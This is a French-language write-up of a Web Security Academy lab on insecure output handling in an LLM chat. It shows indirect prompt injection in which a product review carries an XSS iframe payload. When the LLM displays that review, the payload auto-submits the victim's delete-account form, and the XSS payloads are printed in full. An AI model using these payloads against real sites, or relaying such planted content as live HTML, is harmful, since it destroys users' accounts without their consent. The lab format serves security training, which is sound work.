Explotation par gestion dangereuse des sorties dans les LLM

Exploiting insecure output handling in LLMs

Lab: Exploiting insecure output handling in LLMs | Web Security AcademyWebSecAcademy

Contexte

Ce laboratoire affiche la sortie du LLM de manière non sécurisée, ce qui permet une XSS. L’utilisateur carlos utilise souvent le live chat pour demander des infos sur le produit Lightweight "l33t" Leather Jacket.

Objectif

Réaliser une injection indirecte (indirect prompt injection) afin d’exécuter une XSS qui supprime le compte de carlos.

1) Mise en place

Création d’un compte utilisateur.
Accès au live chat avec le LLM.

2) Vérifications XSS

Test sur le chat (vulnérable)

Payload de test (déclenche une alerte) :

<img src=0 onerror=alert(0)>

Test sur les commentaires (pas vulnérable directement)

Les commentaires ne semblent pas exécuter du HTML/JS de la même manière.

On passe donc par une source consultée par le LLM (contenu récupéré et affiché dans le chat).

3) Point d’entrée : contenu des avis consultés via le LLM

On demande au LLM d’afficher des avis d’un produit (exemple) :

View reviews of the ZZZZZZ bed: your new home office.

Réponse observée (exemple) :

4. **User** - 25 January 2026
   - *Review:* *(Review contains an image)*

L’idée : injecter du HTML dans un avis pour qu’il soit ensuite restitué dans le live chat (où l’affichage est vulnérable).

4) Action ciblée : suppression de compte via formulaire

Pour supprimer un compte depuis My account, on déclenche :

document.forms[1].submit()

Formulaire correspondant :

<form id="delete-account-form" action="/my-account/delete" method="POST">

5) Exploitation : XSS via iframe (auto-submit)

Payload (soumission automatique du formulaire de suppression)

<iframe 
src="my-account" onload="this.contentDocument.forms[1].submit()">

Un premier essai “simple” ne passe pas comme souhaité, donc on l’intègre dans une phrase (variante qui est interprétée) :

Exemple de variante validée :

The unboxing was honestly "<iframe src=my-account onload=this.contentDocument.forms[1].submit()>" a highlight I told my wife, Okay that s actually impressive.

Résultat : le navigateur interprète l’iframe → charge my-account → exécute forms[1].submit() → compte supprimé (testé sur son propre compte).

6) Payload final placé sur le produit ciblé (la veste)

On poste un avis sur Lightweight "l33t" Leather Jacket contenant l’iframe (exemple utilisé) :

When I received this product I got a free T-shirt with "<iframe src =my-account onload = this.contentDocument.forms[1].submit() >" printed on it. I was delighted! This is so cool, I told my wife.

Mis à jour il y a 1 mois

hashtagExploiting insecure output handling in LLMs

hashtagContexte

hashtagObjectif

hashtag1) Mise en place

hashtag2) Vérifications XSS

hashtagTest sur le chat (vulnérable)

hashtagTest sur les commentaires (pas vulnérable directement)

hashtag3) Point d’entrée : contenu des avis consultés via le LLM

hashtag4) Action ciblée : suppression de compte via formulaire

hashtag5) Exploitation : XSS via iframe (auto-submit)

hashtagPayload (soumission automatique du formulaire de suppression)

hashtag6) Payload final placé sur le produit ciblé (la veste)